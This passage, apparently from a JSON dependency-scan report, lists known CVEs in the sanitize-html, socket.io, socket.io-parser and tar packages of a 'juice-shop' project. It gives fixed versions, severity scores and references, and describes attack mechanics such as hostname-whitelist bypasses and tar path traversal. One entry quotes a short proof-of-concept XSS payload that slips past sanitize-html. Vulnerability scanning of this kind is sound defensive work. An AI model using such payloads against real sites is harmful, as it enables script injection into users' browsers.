"https://github.com/apostrophecms/sanitize-html/pull/156", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25225", + "https://www.cve.org/CVERecord?id=CVE-2019-25225" + ], + "PublishedDate": "2025-09-08T10:15:33.44Z", + "LastModifiedDate": "2025-09-19T15:18:42.913Z" + }, + { + "VulnerabilityID": "CVE-2021-26539", + "VendorIDs": [ + "GHSA-rjqq-98f6-6j3r" + ], + "PkgID": "sanitize-html@1.4.2", + "PkgName": "sanitize-html", + "PkgPath": "juice-shop/node_modules/sanitize-html/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "InstalledVersion": "1.4.2", + "FixedVersion": "2.3.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-26539", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:baca9d4107d48d508e3d94dcd47828fbaa07301e7d431baaeb24e78884bce9a7", + "Title": "sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation", + "Description": "Apostrophe Technologies sanitize-html before 2.3.1 does not properly handle internationalized domain name (IDN) which could allow an attacker to bypass hostname whitelist validation set by the \"allowedIframeHostnames\" option.", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V2Score": 5, + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2021-26539", + "https://advisory.checkmarx.net/advisory/CX-2021-4308", + "https://github.com/apostrophecms/sanitize-html", + "https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#231-2021-01-22", + "https://github.com/apostrophecms/sanitize-html/commit/bdf7836ef8f0e5b21f9a1aab0623ae8fcd09c1da", + "https://github.com/apostrophecms/sanitize-html/pull/458", + "https://nvd.nist.gov/vuln/detail/CVE-2021-26539", + "https://www.cve.org/CVERecord?id=CVE-2021-26539" + ], + "PublishedDate": "2021-02-08T17:15:13.673Z", + "LastModifiedDate": "2024-11-21T05:56:26.517Z" + }, + { + "VulnerabilityID": "CVE-2021-26540", + "VendorIDs": [ + "GHSA-mjxr-4v3x-q3m4" + ], + "PkgID": "sanitize-html@1.4.2", + "PkgName": "sanitize-html", + "PkgPath": "juice-shop/node_modules/sanitize-html/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "InstalledVersion": "1.4.2", + "FixedVersion": "2.3.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-26540", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:778579df07505996f41896c68efcfbe40f0586ebe57b221f98d3b8a257b95674", + "Title": "sanitize-html: improper validation of hostnames set by the \"allowedIframeHostnames\" option can lead to bypass hostname whitelist for iframe element", + "Description": "Apostrophe Technologies sanitize-html before 2.3.2 does not properly validate the hostnames set by the \"allowedIframeHostnames\" option when the \"allowIframeRelativeUrls\" is set to true, which allows attackers to bypass hostname whitelist for iframe element, related using an src value that starts with \"/\\\\example.com\".", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V2Score": 5, + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2021-26540", + "https://advisory.checkmarx.net/advisory/CX-2021-4309", + "https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#232-2021-01-26", + "https://github.com/apostrophecms/sanitize-html/pull/460", + "https://nvd.nist.gov/vuln/detail/CVE-2021-26540", + "https://www.cve.org/CVERecord?id=CVE-2021-26540" + ], + "PublishedDate": "2021-02-08T17:15:13.737Z", + "LastModifiedDate": "2024-11-21T05:56:26.67Z" + }, + { + "VulnerabilityID": "CVE-2024-21501", + "VendorIDs": [ + "GHSA-rm97-x556-q36h" + ], + "PkgID": "sanitize-html@1.4.2", + "PkgName": "sanitize-html", + "PkgPath": "juice-shop/node_modules/sanitize-html/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "InstalledVersion": "1.4.2", + "FixedVersion": "2.12.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-21501", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8ba8e17ba2497e04ad628f13f3309c362b13a64c7add6982508d416a4ae7a5d5", + "Title": "sanitize-html: Information Exposure when used on the backend", + "Description": "Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-200", + "CWE-538" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 5.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-21501", + "https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf", + "https://github.com/apostrophecms/apostrophe/discussions/4436", + "https://github.com/apostrophecms/sanitize-html", + "https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4", + "https://github.com/apostrophecms/sanitize-html/pull/650", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EB5JPYRCTS64EA5AMV3INHDPI6I4AW7", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EB5JPYRCTS64EA5AMV3INHDPI6I4AW7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P4I5X6V3LYUNBMZ5YOW4BV427TH3IK4S", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P4I5X6V3LYUNBMZ5YOW4BV427TH3IK4S/", + "https://nvd.nist.gov/vuln/detail/CVE-2024-21501", + "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557", + "https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334", + "https://www.cve.org/CVERecord?id=CVE-2024-21501" + ], + "PublishedDate": "2024-02-24T05:15:44.31Z", + "LastModifiedDate": "2025-04-25T19:37:25.937Z" + }, + { + "VulnerabilityID": "NSWG-ECO-154", + "PkgID": "sanitize-html@1.4.2", + "PkgName": "sanitize-html", + "PkgPath": "juice-shop/node_modules/sanitize-html/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "InstalledVersion": "1.4.2", + "FixedVersion": "\u003e=1.11.4", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:bccf63a45a179dcdd3cd6f1f5b15e0840ec22fcbb2e8d68443232b1654a6541d", + "Title": "Cross Site Scripting", + "Description": "Sanitize-html is a library for scrubbing html input of malicious values.\n\nVersions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios:\n\nIf allowed at least one nonTextTags, the result is a potential XSS vulnerability.\nPoC:\n\n```\nvar sanitizeHtml = require('sanitize-html');\n\nvar dirty = '!\u003ctextarea\u003e\u0026lt;/textarea\u0026gt;\u003csvg/onload=prompt`xs`\u0026gt;\u003c/textarea\u003e!';\nvar clean = sanitizeHtml(dirty, {\n allowedTags: [ 'textarea' ]\n});\n\nconsole.log(clean);\n\n// !\u003ctextarea\u003e\u003c/textarea\u003e\u003csvg/onload=prompt`xs`\u003e\u003c/textarea\u003e!\n```", + "Severity": "MEDIUM", + "VendorSeverity": { + "nodejs-security-wg": 2 + }, + "References": [ + "https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403", + "https://github.com/punkave/sanitize-html/issues/100" + ] + }, + { + "VulnerabilityID": "CVE-2024-38355", + "VendorIDs": [ + "GHSA-25hc-qcg6-38wj" + ], + "PkgID": "socket.io@3.1.2", + "PkgName": "socket.io", + "PkgPath": "juice-shop/node_modules/socket.io/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/socket.io@3.1.2", + "UID": "3f7fdf1c8146fe1c" + }, + "InstalledVersion": "3.1.2", + "FixedVersion": "2.5.1, 4.6.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-38355", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:292c796bf4188bc74e89eac8de1a6a36c0d967b2d11e94ef75d5088b6f161ed1", + "Title": "socket.io: Unhandled 'error' event", + "Description": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit `15af22fc22` which has been included in `socket.io@4.6.2` (released in May 2023). The fix was backported in the 2.x branch as well with commit `d30630ba10`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the \"error\" event to catch these errors.\n", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-20", + "CWE-754" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N", + "V3Score": 7.3, + "V40Score": 6.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 7.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-38355", + "https://github.com/socketio/socket.io", + "https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115", + "https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c", + "https://github.com/socketio/socket.io/security/advisories/GHSA-25hc-qcg6-38wj", + "https://nvd.nist.gov/vuln/detail/CVE-2024-38355", + "https://www.cve.org/CVERecord?id=CVE-2024-38355", + "https://www.vicarius.io/vsociety/posts/unhandled-exception-in-socketio-cve-2024-38355" + ], + "PublishedDate": "2024-06-19T20:15:11.18Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2026-33151", + "VendorIDs": [ + "GHSA-677m-j7p3-52f9" + ], + "PkgID": "socket.io-parser@4.0.5", + "PkgName": "socket.io-parser", + "PkgPath": "juice-shop/node_modules/socket.io-parser/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/socket.io-parser@4.0.5", + "UID": "a00447904d08ddb5" + }, + "InstalledVersion": "4.0.5", + "FixedVersion": "3.3.5, 3.4.4, 4.2.6", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33151", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7424b8bedbc739eb36adb444e09e05b8e2d17928c9cd04bad8ce999151c4c5d5", + "Title": "socket.io: Socket.IO: Denial of Service due to excessive buffering of specially crafted packets", + "Description": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This issue has been patched in versions 3.3.5, 3.4.4, and 4.2.6.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-20", + "CWE-754" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33151", + "https://github.com/socketio/socket.io", + "https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4", + "https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf", + "https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78", + "https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33151", + "https://www.cve.org/CVERecord?id=CVE-2026-33151" + ], + "PublishedDate": "2026-03-20T21:17:15.573Z", + "LastModifiedDate": "2026-04-14T18:22:20.15Z" + }, + { + "VulnerabilityID": "CVE-2023-32695", + "VendorIDs": [ + "GHSA-cqmj-92xf-r6r9" + ], + "PkgID": "socket.io-parser@4.0.5", + "PkgName": "socket.io-parser", + "PkgPath": "juice-shop/node_modules/socket.io-parser/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/socket.io-parser@4.0.5", + "UID": "a00447904d08ddb5" + }, + "InstalledVersion": "4.0.5", + "FixedVersion": "4.2.3, 3.4.3, 3.3.4", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2023-32695", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5cc433e67f56cdd5b6ffba55d528e370cebef65d204f5b11f8618f7f0c2fa2a4", + "Title": "socket.io parser is a socket.io encoder and decoder written in JavaScr ...", + "Description": "socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3.\n\n", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-20", + "CWE-754" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N", + "V3Score": 7.3, + "V40Score": 6.9 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/socketio/socket.io-parser", + "https://github.com/socketio/socket.io-parser/commit/1c220ddbf45ea4b44bc8dbf6f9ae245f672ba1b9", + "https://github.com/socketio/socket.io-parser/commit/2dc3c92622dad113b8676be06f23b1ed46b02ced", + "https://github.com/socketio/socket.io-parser/commit/3b78117bf6ba7e99d7a5cfc1ba54d0477554a7f3", + "https://github.com/socketio/socket.io-parser/commit/ee006607495eca4ec7262ad080dd3a91439a5ba4", + "https://github.com/socketio/socket.io-parser/releases/tag/4.2.3", + "https://github.com/socketio/socket.io-parser/security/advisories/GHSA-cqmj-92xf-r6r9", + "https://nvd.nist.gov/vuln/detail/CVE-2023-32695" + ], + "PublishedDate": "2023-05-27T16:15:09.433Z", + "LastModifiedDate": "2024-11-21T08:03:52.187Z" + }, + { + "VulnerabilityID": "CVE-2026-23745", + "VendorIDs": [ + "GHSA-8qq5-rm4j-mr97" + ], + "PkgID": "tar@4.4.19", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "InstalledVersion": "4.4.19", + "FixedVersion": "7.5.3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:27048ba465c896a6df1dee9d0a70e69a78b229fdb39c5f443b7adc9c8320a1c5", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", + "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "alma": 3, + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:18480", + "https://access.redhat.com/security/cve/CVE-2026-23745", + "https://bugzilla.redhat.com/2425946", + "https://bugzilla.redhat.com/2430538", + "https://bugzilla.redhat.com/2431036", + "https://bugzilla.redhat.com/2431740", + "https://bugzilla.redhat.com/2433645", + "https://bugzilla.redhat.com/show_bug.cgi?id=2425946", + "https://bugzilla.redhat.com/show_bug.cgi?id=2430538", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431036", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431740", + "https://bugzilla.redhat.com/show_bug.cgi?id=2433645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15284", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23950", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842", + "https://errata.almalinux.org/10/ALSA-2026-18480.html", + "https://errata.rockylinux.org/RLSA-2026:18868", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", + "https://www.cve.org/CVERecord?id=CVE-2026-23745" + ], + "PublishedDate": "2026-01-16T22:16:26.83Z", + "LastModifiedDate": "2026-02-18T16:20:07.823Z" + }, + { + "VulnerabilityID": "CVE-2026-23950", + "VendorIDs": [ + "GHSA-r6q2-hw4h-h46w" + ], + "PkgID": "tar@4.4.19", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "InstalledVersion": "4.4.19", + "FixedVersion": "7.5.4", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:bfc47e78454f0229d8f536e6d59fe475430f225d8d9b757e7a22db7a61b752b8", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", + "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-176", + "CWE-352", + "CWE-367" + ], + "VendorSeverity": { + "alma": 3, + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:18480", + "https://access.redhat.com/security/cve/CVE-2026-23950", + "https://bugzilla.redhat.com/2425946", + "https://bugzilla.redhat.com/2430538", + "https://bugzilla.redhat.com/2431036", + "https://bugzilla.redhat.com/2431740", + "https://bugzilla.redhat.com/2433645", + "https://bugzilla.redhat.com/show_bug.cgi?id=2425946", + "https://bugzilla.redhat.com/show_bug.cgi?id=2430538", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431036", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431740", + "https://bugzilla.redhat.com/show_bug.cgi?id=2433645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15284", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23950", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842", + "https://errata.almalinux.org/10/ALSA-2026-18480.html", + "https://errata.rockylinux.org/RLSA-2026:18868", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", + "https://www.cve.org/CVERecord?id=CVE-2026-23950" + ], + "PublishedDate": "2026-01-20T01:15:57.87Z", + "LastModifiedDate": "2026-02-18T15:50:29.91Z" + }, + { + "VulnerabilityID": "CVE-2026-24842", + "VendorIDs": [ + "GHSA-34x7-hfp2-rc4v" + ], + "PkgID": "tar@4.4.19", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "InstalledVersion": "4.4.19", + "FixedVersion": "7.5.7", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:e94c17d43d2c3e8465f8c338870bec0fcab707181cc21f42417818c501866db2", + "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", + "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "alma": 3, + "amazon": 3, + "ghsa": 3, + "redhat": 3, + "rocky": 3 + }, + "CVSS": { + 